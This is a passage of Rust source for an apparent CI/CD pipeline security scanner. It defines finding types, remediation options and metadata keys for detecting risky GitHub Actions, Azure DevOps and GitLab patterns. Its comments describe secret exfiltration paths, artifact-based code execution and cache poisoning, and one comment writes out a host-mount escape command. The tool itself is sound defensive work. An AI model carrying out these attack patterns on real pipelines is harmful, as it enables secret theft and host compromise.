604    /// token, secret, OIDC, registry, cloud, or write authority is present.
605    GhaManifestCargoBuildRsPullRequestWithToken,
606    /// PR/workflow_run/issue_comment-reachable Makefile execution occurs while
607    /// secret, token, OIDC, registry, cloud, or write authority is present.
608    GhaManifestMakefileWithPrTriggerAndSecrets,
609    /// Recursive checkout submodules are enabled in a PR-reachable authority
610    /// job, letting PR-mutable .gitmodules influence workspace code.
611    GhaManifestSubmodulesRecursiveWithPrAuthority,
612    /// A cross-repo reusable workflow call uses a mutable branch/tag ref.
613    GhaCrossrepoWorkflowCallFloatingRefCascade,
614    /// A cross-repo reusable workflow call forwards the caller's full secret
615    /// surface with `secrets: inherit`.
616    GhaCrossrepoSecretsInheritUnreviewedCallee,
617    /// Precision guard for actions that install a helper into the toolcache
618    /// and invoke that absolute path instead of resolving a bare helper from
619    /// runner `PATH`.
620    GhaToolcacheAbsolutePathDowngrade,
621    // Reserved — requires ADO/GH API enrichment beyond pipeline YAML.
622    // Sealed against deserialisation: a custom-rule YAML using these
623    // categories errors out with `unknown variant` at load time, because
624    // they cannot be detected from pipeline YAML alone. They still
625    // serialise normally so future runtime-enrichment paths inside the
626    // taudit binary can emit them, and the output schemas advertise them.
627    /// Requires runtime network telemetry or policy enrichment — not detectable from YAML alone.
628    #[serde(skip_deserializing)]
629    #[doc(hidden)]
630    EgressBlindspot,
631    /// Requires external audit-sink configuration data — not detectable from YAML alone.
632    #[serde(skip_deserializing)]
633    #[doc(hidden)]
634    MissingAuditTrail,
635}
636
637// ── Recommendation ───────────────────────────────────────────────
638
639/// Routing: scope findings -> TsafeRemediation; isolation findings -> CellosRemediation.
640#[allow(missing_docs)]
641#[derive(Debug, Clone, Serialize, Deserialize)]
642#[serde(tag = "type", rename_all = "snake_case")]
643pub enum Recommendation {
644    /// Remediate via `tsafe` — narrow / rotate / revoke a credential or scope.
645    TsafeRemediation {
646        command: String,
647        explanation: String,
648    },
649    /// Remediate via CellOS isolation primitives.
650    CellosRemediation { reason: String, spec_hint: String },
651    /// Pin a floating action reference to an immutable SHA.
652    PinAction { current: String, pinned: String },
653    /// Reduce the permissions block on the scope-bearing step.
654    ReducePermissions { current: String, minimum: String },
655    /// Replace a long-lived static credential with a federated OIDC identity.
656    FederateIdentity {
657        static_secret: String,
658        oidc_provider: String,
659    },
660    /// Free-form manual remediation — used when no canned action applies.
661    Manual { action: String },
662}
663
664// ── FindingSource ────────────────────────────────────────────────
665
666/// Provenance of a finding — distinguishes findings emitted by built-in
667/// taudit rules from findings emitted by user-loaded custom invariant YAML
668/// (`--invariants-dir`). Custom rules can emit arbitrarily-worded findings
669/// at any severity, so an operator piping output into a JIRA workflow or
670/// SARIF upload needs a non-spoofable signal of which file the rule came
671/// from. Serializes as `"built-in"` (string) for built-in findings and
672/// `{"custom": "<path>"}` for custom-rule findings — see
673/// `docs/finding-fingerprint.md` for the contract.
674#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
675#[serde(rename_all = "snake_case")]
676pub enum FindingSource {
677    /// Emitted by a built-in rule defined in `taudit-core::rules`. The
678    /// authoritative trust anchor — the binary's release commit defines the
679    /// rule logic. Serialises as the kebab-case string `"built-in"` to match
680    /// `schemas/finding.v1.json`.
681    #[default]
682    #[serde(rename = "built-in")]
683    BuiltIn,
684    /// Emitted by a custom invariant rule loaded from the given YAML file.
685    /// The path is the file the rule was loaded from, retained so operators
686    /// can audit which file produced any given finding.
687    Custom {
688        /// On-disk path of the custom-rule YAML file that produced this finding.
689        source_file: PathBuf,
690    },
691}
692
693impl FindingSource {
694    /// True for findings emitted by built-in rules.
695    pub fn is_built_in(&self) -> bool {
696        matches!(self, FindingSource::BuiltIn)
697    }
698}
699
700// ── FixEffort ────────────────────────────────────────────────────
701
702/// Coarse-grained remediation effort. Surfaces in JSON `time_to_fix` and SARIF
703/// `properties.timeToFix` so triage dashboards can sort by `severity * effort`.
704///
705/// The four buckets are deliberately wide. Precise time estimates would invite
706/// argument; the buckets exist to separate "flip a flag" from "rewrite a job"
707/// from "renegotiate ops policy".
708///
709/// Per `MEMORY/.../blueteam-corpus-defense.md` Section 3 / Enhancement E-3.
710#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
711#[serde(rename_all = "snake_case")]
712pub enum FixEffort {
713    /// ~5 minutes. Mechanical change to a single file (flip a flag, pin a SHA,
714    /// add a `permissions: {}` block). No structural risk.
715    Trivial,
716    /// ~1 hour. Refactor a step or job: split a script, add a fork-check,
717    /// move a secret to an environment binding.
718    Small,
719    /// ~1 day. Restructure a job or pipeline: introduce an environment gate,
720    /// move from inline scripts to a sandboxed action, add an OIDC role.
721    Medium,
722    /// ~1 week or more. Operational policy change: migrate from PATs to OIDC
723    /// across an org, change branch protection model, retire a service principal.
724    Large,
725}
726
727// ── FindingExtras + Finding ──────────────────────────────────────
728
729/// Optional finding metadata. Lives on every `Finding` via
730/// `#[serde(flatten)]` so consumers see the fields at the top of the
731/// finding object — same place they'd appear if declared inline on
732/// `Finding`. Default-constructed extras serialize to nothing (all
733/// `Option::None` and empty `Vec`s skip-serialize), so existing
734/// snapshots remain byte-stable until a rule populates a field.
735///
736/// **Why a wrapper struct?** The 30+ rule call sites use struct
737/// literal syntax. Adding fields directly to `Finding` would force
738/// every site to edit. With `extras: FindingExtras::default()`, new
739/// extras can be added in a single place.
740#[derive(Debug, Clone, Default, Serialize, Deserialize)]
741pub struct FindingExtras {
742    /// Stable UUID v5 over `(NAMESPACE, fingerprint)` — collapses
743    /// per-hop findings against the same authority root into one group
744    /// for SIEM display. See `compute_finding_group_id`.
745    #[serde(default, skip_serializing_if = "Option::is_none")]
746    pub finding_group_id: Option<String>,
747
748    /// Coarse remediation effort. See `FixEffort`.
749    #[serde(default, skip_serializing_if = "Option::is_none")]
750    pub time_to_fix: Option<FixEffort>,
751
752    /// Human-readable list of controls that already neutralise (or partially
753    /// neutralise) this finding — populated when a compensating-control
754    /// detector downgrades severity. Empty when no downgrade applied.
755    #[serde(default, skip_serializing_if = "Vec::is_empty")]
756    pub compensating_controls: Vec<String>,
757
758    /// Set to `true` by the suppression applicator when a matching
759    /// `.taudit-suppressions.yml` entry exists AND the configured mode
760    /// is `Suppress`. The finding still appears in output (audit trail
761    /// preserved) but consumers can filter on this field.
762    #[serde(default, skip_serializing_if = "is_false")]
763    pub suppressed: bool,
764
765    /// Original pre-downgrade severity. Populated by the suppression
766    /// applicator OR a compensating-control detector when `severity`
767    /// is mutated. `None` means the current severity is the rule-emitted
768    /// value.
769    #[serde(default, skip_serializing_if = "Option::is_none")]
770    pub original_severity: Option<Severity>,
771
772    /// Operator-supplied justification from the matching suppression
773    /// entry. `None` when no suppression applies.
774    #[serde(default, skip_serializing_if = "Option::is_none")]
775    pub suppression_reason: Option<String>,
776
777    /// Per-finding stable anchor mixed into the fingerprint canonical
778    /// string. Populated by rules that have no natural graph node to
779    /// place in `nodes_involved` (e.g. ADO `resources.repositories[]`
780    /// aliases, GitLab `include:` entries, workflow-level invariants).
781    /// When two findings of the same rule fire in the same file, their
782    /// anchors must differ for the fingerprints to differ.
783    ///
784    /// Round-trips through JSON so external tools that recompute
785    /// fingerprints from loaded findings get the same value as the
786    /// emitting taudit run. `None` (the default) and `Some("")` are the
787    /// same equivalence class — both contribute the empty marker to the
788    /// canonical string.
789    #[serde(default, skip_serializing_if = "Option::is_none")]
790    pub fingerprint_anchor: Option<String>,
791
792    /// Scope of confidence for this finding. Current built-in rules are
793    /// `yaml_only`: taudit has proved a static authority shape in the scanned
794    /// YAML artifact, but runtime/provider settings may still affect
795    /// exploitability.
796    #[serde(default, skip_serializing_if = "Option::is_none")]
797    pub confidence_scope: Option<String>,
798
799    /// Human-readable runtime or control-plane assumptions that must be
800    /// verified before treating the static finding as live exploitability.
801    #[serde(default, skip_serializing_if = "Vec::is_empty")]
802    pub runtime_preconditions: Vec<String>,
803
804    /// True when exploitability materially depends on provider-side controls
805    /// not represented in the YAML artifact, such as Azure DevOps service
806    /// connection authorization or GitHub repository settings.
807    #[serde(default, skip_serializing_if = "is_false")]
808    pub portal_control_dependency: bool,
809
810    /// Coarse authority kinds involved in the finding: e.g. `job_token`,
811    /// `oidc_identity`, `service_connection`, `variable_group`,
812    /// `credential_named_variable`, `artifact`, or `image`.
813    #[serde(default, skip_serializing_if = "Vec::is_empty")]
814    pub authority_kinds: Vec<String>,
815
816    /// Coarse attacker-influenced surfaces involved in the finding: e.g.
817    /// `untrusted_checkout`, `script_sink`, `mutable_dependency_ref`,
818    /// `reusable_workflow_boundary`, or `self_hosted_runner`.
819    #[serde(default, skip_serializing_if = "Vec::is_empty")]
820    pub attacker_surface_kinds: Vec<String>,
821
822    /// Template/reusable-workflow resolution strength for delegation findings:
823    /// `resolved`, `partial`, `opaque`, or `not_applicable`.
824    #[serde(default, skip_serializing_if = "Option::is_none")]
825    pub template_resolution_strength: Option<String>,
826
827    /// Relationship between this finding and any cited CVE/advisory:
828    /// `same_primitive`, `same_authority_shape`, `analogue_only`, or
829    /// `not_applicable`.
830    #[serde(default, skip_serializing_if = "Option::is_none")]
831    pub cve_relationship: Option<String>,
832}
833
834impl FindingExtras {
835    /// Convenience constructor for the common case of "default extras
836    /// plus a per-finding fingerprint anchor". Used by rules whose
837    /// emission sites have no natural graph-node anchor and need the
838    /// anchor to discriminate multiple findings of the same rule in one
839    /// file (see `compute_fingerprint` v3 contract).
840    pub fn with_anchor(anchor: impl Into<String>) -> Self {
841        Self {
842            fingerprint_anchor: Some(anchor.into()),
843            ..Self::default()
844        }
845    }
846
847    /// Convenience constructor for report-facing metadata that is not a
848    /// fingerprint anchor. Keeps rule call sites additive rather than forcing
849    /// every built-in rule to hand-populate publication context.
850    pub fn with_confidence_scope(scope: impl Into<String>) -> Self {
851        Self {
852            confidence_scope: Some(scope.into()),
853            ..Self::default()
854        }
855    }
856}
857
858#[allow(clippy::trivially_copy_pass_by_ref)]
859fn is_false(b: &bool) -> bool {
860    !*b
861}
862
863/// A finding is a concrete, actionable authority issue.
864#[allow(missing_docs)]
865#[derive(Debug, Clone, Serialize, Deserialize)]
866pub struct Finding {
867    pub severity: Severity,
868    pub category: FindingCategory,
869    #[serde(skip_serializing_if = "Option::is_none")]
870    pub path: Option<PropagationPath>,
871    pub nodes_involved: Vec<NodeId>,
872    pub message: String,
873    pub recommendation: Recommendation,
874    /// Provenance of this finding. Defaults to `BuiltIn` for backward
875    /// compatibility with code/JSON that predates the field — every
876    /// in-tree built-in rule sets this explicitly. Deserialization of older
877    /// JSON without the field treats the finding as built-in.
878    #[serde(default)]
879    pub source: FindingSource,
880    /// Optional metadata (group id, time-to-fix, compensating controls,
881    /// suppression markers). Flattens into the JSON object so consumers
882    /// see top-level fields — see `FindingExtras` for individual semantics.
883    #[serde(flatten, default)]
884    pub extras: FindingExtras,
885}
886
887impl Finding {
888    /// Builder helper: attach a `time_to_fix` annotation to this finding.
889    /// Call sites: `let f = Finding { ... }.with_time_to_fix(FixEffort::Trivial);`
890    pub fn with_time_to_fix(mut self, effort: FixEffort) -> Self {
891        self.extras.time_to_fix = Some(effort);
892        self
893    }
894
895    /// Builder helper: append a compensating control description and
896    /// downgrade severity by one tier (Critical -> High -> Medium -> Low -> Info).
897    /// Records the original severity so the audit trail survives.
898    pub fn with_compensating_control(mut self, control: impl Into<String>) -> Self {
899        let original = self.severity;
900        self.extras.compensating_controls.push(control.into());
901        self.severity = downgrade_severity(self.severity);
902        if self.extras.original_severity.is_none() {
903            self.extras.original_severity = Some(original);
904        }
905        self
906    }
907}
908
909// ── Graph types: NodeId / EdgeId aliases ─────────────────────────
910
911/// Unique identifier for a node in the authority graph.
912///
913/// **Stability contract.** `NodeId` values are dense indices stable within a
914/// single scan / graph emission (`taudit graph --format json`). They are
915/// **not** stable across separate scans — two runs against the same input
916/// pipeline can renumber nodes if the parser visits them in a different
917/// order. Downstream consumers that need cross-run identity should key on
918/// the finding `fingerprint` (in JSON / SARIF / CloudEvents output) rather
919/// than `NodeId`. See `docs/finding-fingerprint.md`.
920pub type NodeId = usize;
921
922/// Unique identifier for an edge in the authority graph.
923///
924/// **Stability contract.** Same caveat as [`NodeId`] — dense indices stable
925/// within one emitted graph, NOT stable across runs. Use fingerprints for
926/// cross-run identity.
927pub type EdgeId = usize;
928
929// ── Metadata key constants ───────────────────────────────────────
930// Avoids stringly-typed bugs across crate boundaries.
931//
932// Every constant below is a key string that downstream consumers may read
933// from `Node.metadata` or `AuthorityGraph.metadata` in emitted JSON.
934
935/// Records the digest of a pinned action / image reference.
936pub const META_DIGEST: &str = "digest";
937/// Records the `permissions:` block scoped to an Identity / Step node.
938pub const META_PERMISSIONS: &str = "permissions";
939/// Records the inferred breadth of an identity's scope (`broad` / `constrained` / `unknown`).
940pub const META_IDENTITY_SCOPE: &str = "identity_scope";
941/// Marks a metadata value that the parser inferred rather than read literally.
942pub const META_INFERRED: &str = "inferred";
943/// Marks an Image node as a job container (not a `uses:` action).
944pub const META_CONTAINER: &str = "container";
945/// Marks an Identity node as OIDC-capable (`permissions: id-token: write`).
946pub const META_OIDC: &str = "oidc";
947/// Marks a Secret node whose value is interpolated into a CLI flag argument (e.g. `-var "key=$(SECRET)"`).
948/// CLI flag values appear in pipeline log output even when ADO secret masking is active,
949/// because the command string is logged before masking runs and Terraform itself logs `-var` values.
950pub const META_CLI_FLAG_EXPOSED: &str = "cli_flag_exposed";
951/// Graph-level metadata: identifies the trigger type (e.g. `pull_request_target`, `pr`).
952pub const META_TRIGGER: &str = "trigger";
953/// Marks a Step that writes to the environment gate (`$GITHUB_ENV`, ADO `##vso[task.setvariable]`).
954pub const META_WRITES_ENV_GATE: &str = "writes_env_gate";
955/// Marks a Step that writes a `$(secretRef)` value to the env gate. Co-set with
956/// META_WRITES_ENV_GATE when the written VALUE contains an ADO `$(VAR)` expression,
957/// distinguishing secret-exfiltration from plain-integer or literal env-gate writes.
958pub const META_ENV_GATE_WRITES_SECRET_VALUE: &str = "env_gate_writes_secret_value";
959/// Marks a Step that came from an ADO `##vso[task.setvariable]` call (as opposed to
960/// a GHA `>> $GITHUB_ENV` redirect). Used to distinguish the two env-gate write
961/// patterns so BUG-4 suppression only applies to ADO plain-value writes.
962pub const META_SETVARIABLE_ADO: &str = "setvariable_ado";
963/// Marks a Step that reads from the runner-managed environment via an
964/// `env.<NAME>` template reference — `${{ env.X }}` in a `with:` value,
965/// inline script body, or step `env:` mapping. Distinct from `secrets.X`
966/// references (which produce a HasAccessTo edge to a Secret node) — `env.X`
967/// references can be sourced from the ambient runner environment, including
968/// values laundered through `$GITHUB_ENV` by an earlier step. Stamped by
969/// the GHA parser so `secret_via_env_gate_to_untrusted_consumer` can find
970/// the gate-laundering chain that the explicit-secret rules miss.
971pub const META_READS_ENV: &str = "reads_env";
972/// Marks a Step that performs cryptographic provenance attestation (e.g. `actions/attest-build-provenance`).
973pub const META_ATTESTS: &str = "attests";
974/// Marks a Secret node sourced from an ADO variable group (vs inline pipeline variable).
975pub const META_VARIABLE_GROUP: &str = "variable_group";
976/// Marks an Image node as a self-hosted agent pool (pool.name on ADO; runs-on: self-hosted on GHA).
977pub const META_SELF_HOSTED: &str = "self_hosted";
978/// Marks a Step that performs a `checkout: self` (ADO) or default `actions/checkout` on a PR context.
979pub const META_CHECKOUT_SELF: &str = "checkout_self";
980/// Marks an Identity node as an ADO service connection.
981pub const META_SERVICE_CONNECTION: &str = "service_connection";
982/// Marks an Identity node as implicitly injected by the platform (e.g. ADO System.AccessToken).
983/// Implicit tokens are structurally accessible to all tasks by platform design — exposure
984/// to untrusted steps is Info-level (structural) rather than Critical (misconfiguration).
985pub const META_IMPLICIT: &str = "implicit";
986/// Marks a Step that belongs to an ADO deployment job whose `environment:` is
987/// configured with required approvals — a manual gate that breaks automatic
988/// authority propagation. Findings whose path crosses such a node have their
989/// severity reduced by one step (Critical → High → Medium → Low).
990pub const META_ENV_APPROVAL: &str = "env_approval";
991/// Records the parent job name on every Step node, enabling per-job subgraph
992/// filtering (e.g. `taudit map --job build`) and downstream consumers that
993/// need to attribute steps back to their containing job. Set by both the GHA
994/// and ADO parsers on every Step they create within a job's scope.
995pub const META_JOB_NAME: &str = "job_name";
996/// Step-level metadata: normalized GitHub Actions `uses:` action name without
997/// its `@ref` suffix, for example `docker/login-action`. Set only by the GHA
998/// parser on `uses:` steps.
999pub const META_GHA_ACTION: &str = "gha_action";
1000/// Step-level metadata: sorted scalar `with:` inputs for a GHA `uses:` step,
1001/// encoded as newline-delimited `key=value` records. Non-scalar inputs are
1002/// omitted. Consumed by action-specific rules that need precision controls
1003/// such as `mask-password: false` or `skip_install: true`.
1004pub const META_GHA_WITH_INPUTS: &str = "gha_with_inputs";
1005/// Step-level metadata: sorted effective GitHub Actions `env:` assignments
1006/// after workflow ⊕ job ⊕ step merge, encoded as newline-delimited `key=value`
1007/// records. Values are the literal YAML/template strings, not secret values.
1008/// Consumed by env-config and runtime-startup-injection rules.
1009pub const META_GHA_ENV_ASSIGNMENTS: &str = "gha_env_assignments";
1010/// Graph-level metadata: comma-joined list of `workflow_call.inputs.*` names
1011/// declared by a reusable workflow. Empty / absent for ordinary workflows.
1012pub const META_GHA_WORKFLOW_CALL_INPUTS: &str = "gha_workflow_call_inputs";
1013/// Step-level metadata: raw `jobs.<id>.runs-on` value rendered into a compact
1014/// deterministic string. Set on every step in the job and on synthetic
1015/// reusable-workflow caller steps.
1016pub const META_GHA_RUNS_ON: &str = "gha_runs_on";
1017/// Image-node metadata: raw `jobs.<id>.container.options` value, when present.
1018/// Kept separate from the image name because container options can carry
1019/// runtime privilege flags even when the image is pinned.
1020pub const META_GHA_CONTAINER_OPTIONS: &str = "gha_container_options";
1021/// Graph-level metadata: JSON-encoded array of `resources.repositories[]`
1022/// entries declared by the pipeline. Each entry is an object with fields
1023/// `alias`, `repo_type`, `name`, optional `ref`, and `used` (true when the
1024/// alias is referenced via `template: x@alias`, `extends: x@alias`, or
1025/// `checkout: alias` somewhere in the same pipeline file). Set by the ADO
1026/// parser; consumed by `template_extends_unpinned_branch`.
1027pub const META_REPOSITORIES: &str = "repositories";
1028/// Records the raw inline script body of a Step (the text from
1029/// `script:` / `bash:` / `powershell:` / `pwsh:` / `run:` / task
1030/// `inputs.script` / `inputs.Inline` / `inputs.inlineScript`). Stamped by
1031/// parsers when the step has an inline script. Consumed by script-aware
1032/// rules: `vm_remote_exec_via_pipeline_secret`,
1033/// `short_lived_sas_in_command_line`, `secret_to_inline_script_env_export`,
1034/// `secret_materialised_to_workspace_file`, `keyvault_secret_to_plaintext`,
1035/// `add_spn_with_inline_script`, `parameter_interpolation_into_shell`.
1036/// Stored verbatim — rules apply their own pattern matching.
1037pub const META_SCRIPT_BODY: &str = "script_body";
1038/// Records the name of the ADO service connection a step uses (the value of
1039/// `inputs.azureSubscription` / `inputs.connectedServiceName*`). Set on the
1040/// Step node itself (in addition to the Identity node it links to) so rules
1041/// can pattern-match on the connection name without traversing edges.
1042pub const META_SERVICE_CONNECTION_NAME: &str = "service_connection_name";
1043/// Marks a Step as performing `terraform apply ... -auto-approve` (either via
1044/// an inline script or via a `TerraformCLI` / `TerraformTask` task with
1045/// `command: apply` and `commandOptions` containing `auto-approve`).
1046pub const META_TERRAFORM_AUTO_APPROVE: &str = "terraform_auto_approve";
1047/// Marks a Step task that runs with `addSpnToEnvironment: true`, exposing
1048/// the federated SPN (idToken / servicePrincipalKey / servicePrincipalId /
1049/// tenantId) to the inline script body via environment variables.
1050pub const META_ADD_SPN_TO_ENV: &str = "add_spn_to_environment";
1051/// Graph-level metadata: identifies the source platform of the parsed
1052/// pipeline. Set by every parser to its `platform()` value
1053/// (`"github-actions"`, `"azure-devops"`, `"gitlab"`). Allows platform-scoped
1054/// rules to gate their detection without parsing the source file path.
1055pub const META_PLATFORM: &str = "platform";
1056/// Graph-level metadata: marks a GitHub Actions workflow as having NO
1057/// top-level `permissions:` block declared. Set by the GHA parser when
1058/// `workflow.permissions` is absent so rules can detect the negative-space
1059/// "no permissions block at all" pattern (which leaves `GITHUB_TOKEN` at its
1060/// broad platform default — `contents: write`, `packages: write`, etc.).
1061pub const META_NO_WORKFLOW_PERMISSIONS: &str = "no_workflow_permissions";
1062/// Marks a Step in a GHA workflow as carrying an `if:` condition that
1063/// references the standard fork-check pattern
1064/// (`github.event.pull_request.head.repo.fork == false` or the equivalent
1065/// `head.repo.full_name == github.repository`). Stamped by the GHA parser so
1066/// rules can credit the step with the compensating control without
1067/// re-parsing the YAML expression. Bool stored as `"true"`.
1068pub const META_FORK_CHECK: &str = "fork_check";
1069/// Marks a GitLab CI job (Step node) whose `rules:` or `only:` clause
1070/// restricts execution to protected branches — either via an explicit
1071/// `if: $CI_COMMIT_REF_PROTECTED == "true"` rule, an `if: $CI_COMMIT_BRANCH
1072/// == $CI_DEFAULT_BRANCH` rule, or an `only: [main, ...]` allowlist of
1073/// platform-protected refs. Set by the GitLab parser. Absence on a
1074/// deployment job is a control gap.
1075pub const META_RULES_PROTECTED_ONLY: &str = "rules_protected_only";
1076/// Graph-level metadata: comma-joined list of every entry under `on:` (e.g.
1077/// `pull_request_target,issue_comment,workflow_run`). Distinct from
1078/// `META_TRIGGER` (singular) which is set only for `pull_request_target` /
1079/// ADO `pr` to preserve the existing `trigger_context_mismatch` contract.
1080/// Consumers of this list (e.g. `risky_trigger_with_authority`) must split on
1081/// `,` and treat each token as a trigger name.
1082pub const META_TRIGGERS: &str = "triggers";
1083/// Graph-level metadata: comma-joined list of `workflow_dispatch.inputs.*`
1084/// names declared by the workflow. Empty / absent if the workflow has no
1085/// `workflow_dispatch` trigger. Consumed by
1086/// `manual_dispatch_input_to_url_or_command` to taint-track input flow into
1087/// command lines, URLs, and `actions/checkout` refs.
1088pub const META_DISPATCH_INPUTS: &str = "dispatch_inputs";
1089/// Graph-level metadata: pipe-delimited list of `<job>\t<name>\t<source>`
1090/// records, one per `jobs.<id>.outputs.<name>`. Records are joined with `|`,
1091/// fields within a record with `\t`. `source` is one of `secret` (value
1092/// reads `secrets.*`), `oidc` (value references `steps.*.outputs.*` from a
1093/// step that holds an OIDC identity), `step_output` (any other
1094/// `steps.*.outputs.*`), or `literal`. Plain-text rather than JSON to keep
1095/// the parser crate free of `serde_json`. Consumed by
1096/// `sensitive_value_in_job_output`.
1097pub const META_JOB_OUTPUTS: &str = "job_outputs";
1098/// Step-level metadata: the value passed to `actions/checkout`'s `with.ref`
1099/// input (verbatim, including any `${{ … }}` expressions). Stamped only on
1100/// `actions/checkout` steps that supply a `ref:`. Consumed by
1101/// `manual_dispatch_input_to_url_or_command`.
1102pub const META_CHECKOUT_REF: &str = "checkout_ref";
1103/// Marks the synthetic Step node created for a job that delegates to a
1104/// reusable workflow with `secrets: inherit`. The whole secret bag forwards
1105/// to the callee regardless of what the callee actually consumes — when the
1106/// caller is fired by an attacker-controllable trigger this is a wide-open
1107/// exfiltration path. Set on the synthetic step node by the GHA parser.
1108pub const META_SECRETS_INHERIT: &str = "secrets_inherit";
1109/// Marks a Step that downloads a workflow artifact (typically
1110/// `actions/download-artifact` or `dawidd6/action-download-artifact`).
1111/// In `workflow_run`-triggered consumers, the originating run's artifacts
1112/// were produced from PR context — the consumer must treat their content as
1113/// untrusted input even when the consumer itself runs with elevated perms.
1114pub const META_DOWNLOADS_ARTIFACT: &str = "downloads_artifact";
1115/// Marks a Step whose body interprets artifact (or other untrusted file)
1116/// content into a privileged sink — `unzip`/`tar -x`, `cat`/`jq` piping
1117/// into `>> $GITHUB_ENV`/`>> $GITHUB_OUTPUT`, `eval`, posting to a PR
1118/// comment via `actions/github-script` `body:`/`issue_body:`, or evaluating
1119/// extracted text. Combined with `META_DOWNLOADS_ARTIFACT` upstream in the
1120/// same job and a `workflow_run`/`pull_request_target` trigger this is the
1121/// classic mypy_primer / coverage-comment artifact-RCE pattern.
1122pub const META_INTERPRETS_ARTIFACT: &str = "interprets_artifact";
1123/// Marks a Step that uses an interactive debug action (mxschmitt/action-tmate,
1124/// lhotari/action-upterm, actions/tmate, etc.). The cell value is the action
1125/// reference (e.g. `mxschmitt/action-tmate@v3`). A successful debug session
1126/// gives the operator an external SSH endpoint with the runner's full
1127/// environment loaded — every secret in scope, the checked-out HEAD, and
1128/// write access to whatever the GITHUB_TOKEN holds.
1129pub const META_INTERACTIVE_DEBUG: &str = "interactive_debug";
1130/// Marks a Step that calls `actions/cache` (or `actions/cache/save` /
1131/// `actions/cache/restore`). The cell value is the raw `key:` input from
1132/// the step's `with:` block. Consumed by `pr_specific_cache_key_in_default_branch_consumer`
1133/// to detect PR-derived cache keys (head_ref, head.ref, actor) that a
1134/// default-branch run can later restore — classic cache poisoning.
1135pub const META_CACHE_KEY: &str = "cache_key";
1136/// Records the OIDC audience (`aud:`) value of an `id_tokens:` entry on an
1137/// Identity node. GitLab CI emits one Identity per `id_tokens:` key; the
1138/// audience is what trades for downstream cloud creds (Vault path, AWS role,
1139/// etc), so audience reuse across MR-context and protected-context jobs is
1140/// the precise privilege-overscope signal. Set by the GitLab parser.
1141pub const META_OIDC_AUDIENCE: &str = "oidc_audience";
1142/// Records the comma-joined list of `id_tokens.aud:` values when GitLab CI
1143/// declares the audience as a YAML sequence (multi-cloud broker — strongest
1144/// over-scoping signal). When set, the legacy `META_OIDC_AUDIENCE` field
1145/// holds the same comma-joined string for backward compatibility, and this
1146/// field is the explicit "this was a list" marker. Set by the GitLab parser
1147/// only on the multi-aud path; absent for scalar `aud:` values.
1148pub const META_OIDC_AUDIENCES: &str = "oidc_audiences";
1149/// Records a Step's `environment:url:` value verbatim. Stamped by the GitLab
1150/// parser when the job declares an `environment:` mapping with a `url:`
1151/// field. Consumed by `untrusted_ci_var_in_shell_interpolation` because
1152/// `environment:url:` is rendered by the GitLab UI and any predefined-CI-var
1153/// interpolated into it is a stored-XSS / open-redirect sink.
1154pub const META_ENVIRONMENT_URL: &str = "environment_url";
1155/// Graph-level metadata: JSON-encoded array of `include:` entries declared by
1156/// a GitLab CI pipeline. Each entry is an object with fields:
1157/// - `kind`: one of `local`, `remote`, `template`, `project`, `component`
1158/// - `target`: the path/URL/project string
1159/// - `git_ref`: the resolved `ref:` value (only meaningful for `project` and
1160///   `remote`) — empty string when the include omits a `ref:`
1161///
1162/// Set by the GitLab parser; consumed by `unpinned_include_remote_or_branch_ref`.
1163pub const META_GITLAB_INCLUDES: &str = "gitlab_includes";
1164/// Marks a Step (GitLab job) that declares one or more `services:` entries
1165/// matching `docker:*-dind` or `docker:dind`. Combined with secret-bearing
1166/// HasAccessTo edges it indicates a runtime sandbox-escape primitive — any
1167/// inline build step can `docker run -v /:/host` from inside dind.
1168pub const META_GITLAB_DIND_SERVICE: &str = "gitlab_dind_service";
1169/// Marks a Step (GitLab job) declared with `allow_failure: true`. Used by
1170/// `security_job_silently_skipped` to detect scanner jobs that pass silently.
1171pub const META_GITLAB_ALLOW_FAILURE: &str = "gitlab_allow_failure";
1172/// Records the comma-joined list of `extends:` template names a GitLab job
1173/// inherits from. Used by scanner-name pattern matching in
1174/// `security_job_silently_skipped` because GitLab security templates are
1175/// usually consumed via `extends:` rather than by job-name match.
1176pub const META_GITLAB_EXTENDS: &str = "gitlab_extends";
1177/// Marks a Step (GitLab job) that defines a `trigger:` block (downstream /
1178/// child pipeline). Value is `"static"` for a fixed downstream `project:` or
1179/// `include:` of in-tree YAML, and `"dynamic"` when the include source is an
1180/// `artifact:` (dynamic child pipelines — code-injection sink).
1181pub const META_GITLAB_TRIGGER_KIND: &str = "gitlab_trigger_kind";
1182/// Records the literal `cache.key:` value declared on a GitLab job (or the
1183/// empty string if no cache is declared). Consumed by
1184/// `cache_key_crosses_trust_boundary` to detect cross-trust cache keys.
1185pub const META_GITLAB_CACHE_KEY: &str = "gitlab_cache_key";
1186/// Records the `cache.policy:` value declared on a GitLab job
1187/// (`pull` / `push` / `pull-push` / `pull_push`). When absent, the GitLab
1188/// runtime default is `pull-push`. Consumed by
1189/// `cache_key_crosses_trust_boundary`.
1190pub const META_GITLAB_CACHE_POLICY: &str = "gitlab_cache_policy";
1191/// Records the deployment environment name on a Step
1192/// (e.g. GitLab `environment.name:` / GHA `environment:`).
1193/// Used by rules that gate on production-like environment names.
1194pub const META_ENVIRONMENT_NAME: &str = "environment_name";
1195/// Records the GitLab `artifacts.reports.dotenv:` file path for a Step.
1196/// When set, the file's `KEY=value` lines are silently exported as
1197/// pipeline variables for every downstream job that consumes this job
1198/// via `needs:` or `dependencies:`. Consumed by
1199/// `dotenv_artifact_flows_to_privileged_deployment`.
1200pub const META_DOTENV_FILE: &str = "dotenv_file";
1201/// Records, on a Step, the upstream job names this step consumes via
1202/// GitLab `needs:` or `dependencies:`. Comma-separated job names.
1203/// Used to build dotenv-flow dependency chains across stages.
1204pub const META_NEEDS: &str = "needs";
1205/// Marks an Image node (self-hosted agent pool) as having workspace isolation
1206/// configured (`workspace: { clean: all }` or `workspace: { clean: true }` in
1207/// ADO). When present, the agent workspace is wiped between runs, mitigating
1208/// workspace poisoning attacks where a PR build leaves malicious files for the
1209/// next privileged pipeline run. Absence of this key on a self-hosted Image
1210/// node is the signal for `shared_self_hosted_pool_no_isolation`.
1211pub const META_WORKSPACE_CLEAN: &str = "workspace_clean";
1212/// Step-level metadata: the AND-joined chain of `condition:` expressions that
1213/// gate this step's runtime execution (stage condition, then job condition,
1214/// then step condition, joined with ` AND `). Stamped by parsers that surface
1215/// runtime gating expressions — currently the ADO parser (stage / job / step
1216/// `condition:`). Presence of this key means the step is NOT unconditionally
1217/// reachable on every trigger; the runtime evaluator decides via expression
1218/// (e.g. `eq(variables['Build.SourceBranch'], 'refs/heads/main')`). Consumed
